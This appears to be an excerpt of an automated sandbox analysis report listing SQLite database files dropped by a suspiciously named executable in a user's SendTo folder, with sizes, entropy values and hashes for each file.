                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
